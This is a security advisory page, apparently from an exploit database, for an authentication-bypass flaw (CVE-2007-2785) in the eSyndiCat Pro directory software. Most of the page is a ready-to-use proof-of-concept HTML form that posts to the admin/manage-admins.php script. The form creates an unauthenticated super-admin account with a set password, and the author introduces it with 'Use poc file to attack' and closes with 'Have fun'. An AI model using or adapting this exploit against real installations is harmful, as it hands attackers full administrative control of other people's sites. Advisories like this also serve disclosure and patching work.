Bug: eSyndiCat Input Validation Error Vulnerability ( Ascii Version )

Search:
WLB2

eSyndiCat Input Validation Error Vulnerability

Published
Credit
Risk
2007.05.25
hack2prison yahoo com
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-2785
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

eSyndiCat is Directory websystem, a product of eSyndiCat.com
It has security hole allow attackers get admin and more and more.
Infected version: eSyndiCat Pro v1.x
Infected file: manage-admins.php
Use poc file to attack:

------------------------------------------------
<p>Discovered by H2P - A member of http://vnbrain.net
<form action="http://target/path/admin/manage-admins.php?action=add" method="post">
<table cellspacing="0" cellpadding="0" width="100%" class="striped">
<tr>
<td width="200"><strong>Admin username:</strong></td>
<td><input type="text" name="username" size="22"
value="checked"/></td>
</tr>
<tr>
<td><strong>Admin Fullname:</strong></td>
<td><input type="text" name="fullname" size="22" value="Check
Only"/></td>
</tr>
<tr>
<td><strong>Admin Email:</strong></td>
<td>
<input type="text" name="email" size="22" value="hack2prison (at) freeprotect
(dot) net [email concealed]" /></td>
</tr>
<tr>
<td><strong>Admin password:</strong></td>
<td><input type="password" name="new_pass" size="22" value="123456"
/></td>
</tr>
<tr>
<td><strong>Admin Password Confirmation:</strong></td>
<td><input type="password" name="new_pass2" size="22" value="123456"
/></td>
</tr>
<tr>
<td><strong>Admin Status:</strong></td>
<td><select name="status">
<option value="active" >Active</option>
<option value="approval" >Approval</option>
</select></td>
</tr>
<tr>
<td><strong>Submission Notification:</strong></td>
<td><input type="radio" name="submit_notif" value="1" id="lsn1"
checked="checked" /><label for="lsn1">Enabled</label>
<input type="radio" name="submit_notif" value="0" id="lsn0" /><label
for="lsn0">Disabled</label>
</td>
</tr>
<tr>
<td><strong>Payment Notification:</strong></td>

<td><input type="radio" name="payment_notif" value="1" id="lpn1"
checked="checked" /><label for="lpn1">Enabled</label>
<input type="radio" name="payment_notif" value="0" id="lpn0" /><label
for="lpn0">Disabled</label>
</td>
</tr>

<tr>
<td class="caption" colspan="2"><strong>Admin Permissions</strong></td>
</tr>
<tr>
<td><strong>Super Admin:</strong></td>
<td><input type="radio" name="super" value="1" id="type1"
checked="checked" onclick="javascript:document.getElementById('permissions').style.display
='none';" /><label for="type1">Enabled</label>
<input type="radio" name="super" value="0" id="type0"
onclick="javascript:document.getElementById('permissions').style.display
='block';"/><label for="type0">Disabled</label>
</td>
</tr>
</table>

<table cellspacing="0" width="100%">
<tr class="all">
<td colspan="2"><input type="submit" name="save" value="Save Changes"
/>
<input type="hidden" name="id" value="" />
<input type="hidden" name="action" value="add" />
</td>
</tr>
</table>
</form>
------------------------------------------------

Have fun

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version